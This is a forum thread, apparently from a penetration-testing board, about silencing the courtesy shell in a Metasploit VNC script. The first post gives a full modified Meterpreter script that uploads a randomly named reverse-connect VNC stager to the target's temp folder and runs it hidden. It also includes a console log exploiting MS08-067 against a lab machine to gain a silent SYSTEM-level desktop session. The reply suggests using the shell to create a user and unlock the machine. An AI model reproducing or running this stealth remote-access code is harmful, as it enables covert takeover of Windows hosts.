Results 1 to 2 of 2

Thread: msf vnc courtesy shell

  1. #1
    prowl3r
    Guest

    Default msf vnc courtesy shell

    I've been testing the new vnc meterpreter script hdm just wrote, as per:

    Twitter / HD Moore: RunVNC: quickly spawn a V ...

    It works just fine. However, it pops a courtesy shell, so I added:

    Code:
    set DisableCourtesyShell TRUE
    just before executing the exploit. The parameter was properly echoed. But the courtesy shell keeps showing.

    Has anyone else tried this?

    Edit. Possibly this is due it's a meterpreter script, not a payload. Just wondering if there's a command available to disable it.

    Edit 2.

    Ok, guys, flooded by replies

    Nevermind, I modified the original script vnc.rb as follows:

    Code:
    # $Id: vnc.rb 7872 2009-12-15 05:10:33Z hdm $
    
    #
    # Meterpreter script for obtaining a quick VNC session
    #
    
    session = client
    
    #
    # Options
    #
    opts = Rex::Parser::Arguments.new(
    	"-h"  => [ false,  "This help menu"],
    	"-r"  => [ true,   "The IP of the system running Metasploit listening for the connect back"],
    	"-p"  => [ true,   "The port on the remote host where Metasploit is listening (default: 4545)"],
    	"-D"  => [ false,  "Disable the automatic multi/handler (use with -r to accept on another system)"]
    )
    
    #
    # Default parameters
    #
    
    rhost    = Rex::Socket.source_address("1.2.3.4")
    rport    = 4545
    autoconn = true
    
    #
    # Option parsing
    #
    opts.parse(args) do |opt, idx, val|
    	case opt
    	when "-h"
    		print_line(opts.usage)
    		return
    	when "-r"
    		rhost = val
    	when "-p"
    		rport = val.to_i
    	when "-D"
    		autoconn = false
    	end
    end
    
    #
    # Create the agent EXE
    #
    print_status("Creating a VNC stager: LHOST=#{rhost} LPORT=#{rport})")
    pay = client.framework.payloads.create("windows/vncinject/reverse_tcp")
    pay.datastore['LHOST'] = rhost
    pay.datastore['LPORT'] = rport
    raw  = pay.generate
    
    exe = ::Msf::Util::EXE.to_win32pe(client.framework, raw)
    print_status("VNC stager executable #{exe.length} bytes long")
    
    
    #
    # Upload to the filesystem
    #
    
    tempdir = client.fs.file.expand_path("%TEMP%")
    tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
    tempexe.gsub!("\\\\", "\\")
    
    fd = client.fs.file.new(tempexe, "wb")
    fd.write(exe)
    fd.close
    
    print_status("Uploaded the VNC agent to #{tempexe} (must be deleted manually)")
    
    #
    # Setup the multi/handler if requested
    #
    
    if(autoconn)
    	mul = client.framework.exploits.create("multi/handler")
    	mul.datastore['PAYLOAD']   = "windows/vncinject/reverse_tcp"
    	mul.datastore['LHOST']     = rhost
    	mul.datastore['LPORT']     = rport
    	mul.datastore['EXITFUNC']  = 'process'
    	mul.datastore['ExitOnSession'] = true
    	mul.datastore['DisableCourtesyShell'] = true
    
    	mul.exploit_simple(
    		'Payload'        => mul.datastore['PAYLOAD'],
    		'RunAsJob'       => true
    	)
    end
    
    #
    # Execute the agent
    #
    print_status("Executing the VNC agent with endpoint #{rhost}:#{rport}...")
    proc = session.sys.process.execute(tempexe, nil, {'Hidden' => true})
    Then, saved as:

    Code:
    /pentest/exploits/framework3/scripts/meterpreter/vncstealth.rb
    And tested it:

    Code:
                                      _       _
                 _                   | |     (_)_
     ____   ____| |_  ____  ___ ____ | | ___  _| |_
    |    \ / _  )  _)/ _  |/___)  _ \| |/ _ \| |  _)
    | | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
    |_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
                               |_|
    
    
           =[ metasploit v3.3.3-dev [core:3.3 api:1.0]
    + -- --=[ 476 exploits - 220 auxiliary
    + -- --=[ 262 payloads - 22 encoders - 8 nops
           =[ svn r7893 updated today (2009.12.16)
    
    msf > use exploit/windows/smb/ms08_067_netapi
    msf exploit(ms08_067_netapi) > set RHOST 192.168.1.2
    RHOST => 192.168.1.2
    msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    msf exploit(ms08_067_netapi) > set LHOST 192.168.1.6
    LHOST => 192.168.1.6
    msf exploit(ms08_067_netapi) > set LPORT 4444
    LPORT => 4444
    msf exploit(ms08_067_netapi) > exploit
    [*] Started reverse handler on port 4444[*] Automatically detecting the target...[*] Fingerprint: Windows XP Service Pack 2 - lang:English[*] Selected Target: Windows XP SP2 English (NX)[*] Triggering the vulnerability...[*] Sending stage (723456 bytes)[*] Meterpreter session 1 opened (192.168.1.6:4444 -> 192.168.1.2:1035)
    
    meterpreter > run vncstealth[*] Creating a VNC stager: LHOST=192.168.1.6 LPORT=4545)[*] VNC stager executable 87552 bytes long[*] Uploaded the VNC agent to C:\WINDOWS\TEMP\udoGvQNkBM.exe (must be deleted manually)[*] Executing the VNC agent with endpoint 192.168.1.6:4545...[*] VNC Server session 2 opened (192.168.1.6:4545 -> 192.168.1.2:1036)
    meterpreter > Connected to RFB server, using protocol version 3.3
    No authentication needed
    Desktop name "VNCShell [SYSTEM@LAB-VICTIM] - Full Access"
    VNC server default format:
      32 bits per pixel.
      Least significant byte first in each pixel.
      True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
    Using default colormap which is TrueColor.  Pixel format:
      32 bits per pixel.
      Least significant byte first in each pixel.
      True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
    Using shared memory PutImage
    Same machine: preferring raw encoding
    It's bloody silent now. No pop-up courtesy shell.

  2. #2
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    19

    Default

    WELL HDM IS SUPER wise and thats the reason why he purposely included the vnc courtesy shell, well even I dnt knew the reason until one of my friends explained the reason,

    Well at normal conditions when a system is left unused the system either get screen saver password protected , so when we get a courtesy shell you could unlock the machine by creating a new user as u have a shell

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •